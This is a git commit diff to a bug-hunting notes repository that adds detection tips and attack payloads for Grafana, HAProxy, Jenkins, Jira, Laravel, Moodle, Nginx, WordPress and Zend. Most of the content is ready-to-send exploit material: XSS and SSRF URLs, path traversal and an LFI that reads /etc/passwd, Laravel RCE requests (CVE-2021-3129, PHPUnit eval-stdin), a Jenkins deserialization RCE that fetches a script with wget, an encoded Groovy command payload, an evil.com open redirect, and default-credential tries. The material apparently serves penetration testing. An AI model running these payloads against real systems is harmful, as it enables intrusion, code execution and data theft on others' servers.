Adding some 'technology' information

This commit is contained in:
Muhammad Daffa 2022-06-18 20:26:55 +07:00
parent a2c07348e3
commit a0048665a1
9 changed files with 169 additions and 67 deletions

View File

@ -1,16 +1,16 @@
# Grafana
1. CVE-2021-41174 (Reflected XSS)
```
<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
```
2. CVE-2020-13379 (Denial of Service)
```
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
```
3. CVE-2020-11110 (Stored XSS)
```
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Host: example.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
@ -22,7 +22,7 @@ Connection: close
4. CVE-2019-15043 (Grafana Unauthenticated API)
```
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Host: example.com
Connection: close
Content-Length: 235
Accept: */*
@ -37,5 +37,5 @@ Try to login using admin as username and password
```
6. Signup Enabled
```
<GRAFANA URL>/signup
https://example.com/signup
```

View File

@ -1,4 +1,11 @@
# HAProxy
# HAProxy Common Bugs
## Introduction
What would you do if you came across a website that uses HAProxy?
## How to Detect
-
1. CVE-2021-40346 (HTTP Request Smuggling)
```
POST /index.html HTTP/1.1

View File

@ -1,5 +1,18 @@
## Jenkins
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
# Jenkins Common Bugs
## Introduction
What would you do if you came across a website that uses Jenkins?
## How to Detect
Usually in the HTTP response there is a header like this `X-Jenkins`
1. Find the related CVE by checking jenkins version
* How to find the jenkins version
By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins)
Some example CVE:
- Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
@ -9,7 +22,7 @@ java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.s
./jenkins_rce.py jenkins_ip jenkins_port payload.out
```
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
- Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
@ -18,13 +31,9 @@ If the Jenkins requests authentication but returns valid data using the followin
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
```
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
4. CVE-2019-1003030
- CheckScript RCE in Jenkins (CVE-2019-1003030)
How to Exploit:
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
@ -56,11 +65,15 @@ to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
2. Default Credentials
```
Try to login using admin as username and password
```
How to exploit:
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
3. Unauthenticated Jenkins Dashboard
```
Access https://target.com and if there is no login form then it is vulnerable
```
Reference:
- https://github.com/gquere/pwn_jenkins
## Reference
* [pwn_jenkins](https://github.com/gquere/pwn_jenkins)

View File

@ -1,48 +1,65 @@
# Unauthenticated Jira CVEs
1. CVE-2017-9506 (SSRF)
# Jira Common Bugs
## Introduction
What would you do if you came across a website that uses Jira?
## How to Detect
```
https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
```
2. CVE-2018-20824 (XSS)
1. Find the related CVE by checking jira version
* How to find the jira version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
Some example CVE:
- CVE-2017-9506 (SSRF)
```
https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
```
3. CVE-2019-8451 (SSRF)
- CVE-2018-20824 (XSS)
```
https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
```
4. CVE-2019-8449 (User Information Disclosure)
- CVE-2019-8451 (SSRF)
```
https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
https://example.com/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
```
5. CVE-2019-8442 (Sensitive Information Disclosure)
- CVE-2019-8449 (User Information Disclosure)
```
https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
```
6. CVE-2019-3403 (User Enumeration)
- CVE-2019-8442 (Sensitive Information Disclosure)
```
https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
```
7. CVE-2020-14181 (User Enumeration)
- CVE-2019-3403 (User Enumeration)
```
https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
https://example.com/rest/api/2/user/picker?query=<USERNAME_HERE>
```
8. CVE-2020-14178 (Project Key Enumeration)
- CVE-2020-14181 (User Enumeration)
```
https://<JIRA_URL>/browse.<PROJECT_KEY>
https://example.com/secure/ViewUserHover.jspa?username=<USERNAME>
```
9. CVE-2020-14179 (Information Disclosure)
- CVE-2020-14178 (Project Key Enumeration)
```
https://<JIRA_URL>/secure/QueryComponent!Default.jspa
https://example.com/browse.<PROJECT_KEY>
```
10. CVE-2019-11581 (Template Injection)
- CVE-2020-14179 (Information Disclosure)
```
<JIRA_URL>/secure/ContactAdministrators!default.jspa
https://example.com/secure/QueryComponent!Default.jspa
```
- CVE-2019-11581 (Template Injection)
```
example.com/secure/ContactAdministrators!default.jspa
* Try the SSTI Payloads
```
11. CVE-2019-3396 (Path Traversal)
- CVE-2019-3396 (Path Traversal)
```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
@ -56,10 +73,19 @@ Connection: close
*Try above request with the Jira target
```
12. CVE-2019-3402 (XSS)
- CVE-2019-3402 (XSS)
```
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
```
Reference:
- https://twitter.com/harshbothra
2. Signup enabled
```
POST /servicedesk/customer/user/signup HTTP/1.1
Host: example.com
Content-Type: application/json
{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true}
```
## Reference
* [@harshbothra](https://twitter.com/harshbothra)

View File

@ -1,26 +1,46 @@
# Common bug in laravel framework
1. Laravel PHPUnit Remote Code Execution
* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
* Affected versions : Before 4.8.28 and 5.x before 5.6.3
# Laravel Common Bugs
Command
## Introduction
What would you do if you came across a website that uses Laravel?
## How to Detect
Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=`
1. Find the related CVE by checking laravel version
* How to find the laravel version
By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html)
Some example CVE:
- CVE-2021-3129 (Remote Code Execution)
```
curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
POST /_ignition/execute-solution HTTP/1.1
Host: example.com
Accept: application/json
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
```
2. Exposed environment variables
* Full Path Exploit : http://target.com/.env
2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)
```
curl -d "<?php echo php_uname(); ?>" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```
3. Exposed environment variables
* Full Path Exploit : http://example.com/.env
![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
3. Exposed log files
* Full Path Exploit : http://target.com/storage/logs/laravel.log
4. Exposed log files
* Full Path Exploit : http://example.com/storage/logs/laravel.log
4. Laravel Debug Mode Enabled
* Using SQL injection query in GET or POST method
* Try path /logout (ex:target.com/logout)
* Using [] in paramater (ex:target.com/param[]=0)
5. Laravel Debug Mode Enabled
* Try to request to https://example.com using POST method (Error 405)
* Using [] in paramater (ex:example.com/param[]=0)
![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)
## References
* [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)

View File

@ -1,4 +1,10 @@
# Moodle
# Moodle Common Bugs
## Introduction
What would you do if you came across a website that uses Moodle?
## How to Detect
If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`
1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
```
@ -8,5 +14,11 @@ https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
```
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
```
3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
```
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
```

View File

@ -1,6 +1,17 @@
# Nginx
# Nginx Common Bugs
1. Directory traversal
## Introduction
What would you do if you came across a website that uses Nginx?
## How to Detect
Usually in the HTTP response there is a header like this `Server: nginx`
1. Find the related CVE by checking nginx version
* How to find the nginx version
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated nginx version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-315/product_id-101578/F5-Nginx.html)
2. Directory traversal
```
https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css
@ -9,3 +20,8 @@ https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css
```
3. Nginx status page
```
https://example.com/nginx_status
```

View File

@ -3,6 +3,9 @@
## Introduction
What would you do if you came across a website that uses WordPress?
## How to Detect
If you visit `https://target.com` and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit `https://target.com/wp-login.php`, it is the WordPress login admin page
1. Find the related CVE by checking the core, plugins, and theme version
* How to find the wordpress version
```
@ -99,3 +102,8 @@ Host: target.com
</param></params>
</methodCall>
```
7. Register enabled
```
http://example.com/wp-login.php?action=register
```

View File

@ -1,10 +1,10 @@
# Common bug in Zend framework
# Zend Common Bugs
## Introduction
What would you do if you came across a website that uses Zend?
## How to Detect
-
1. Finding config files
```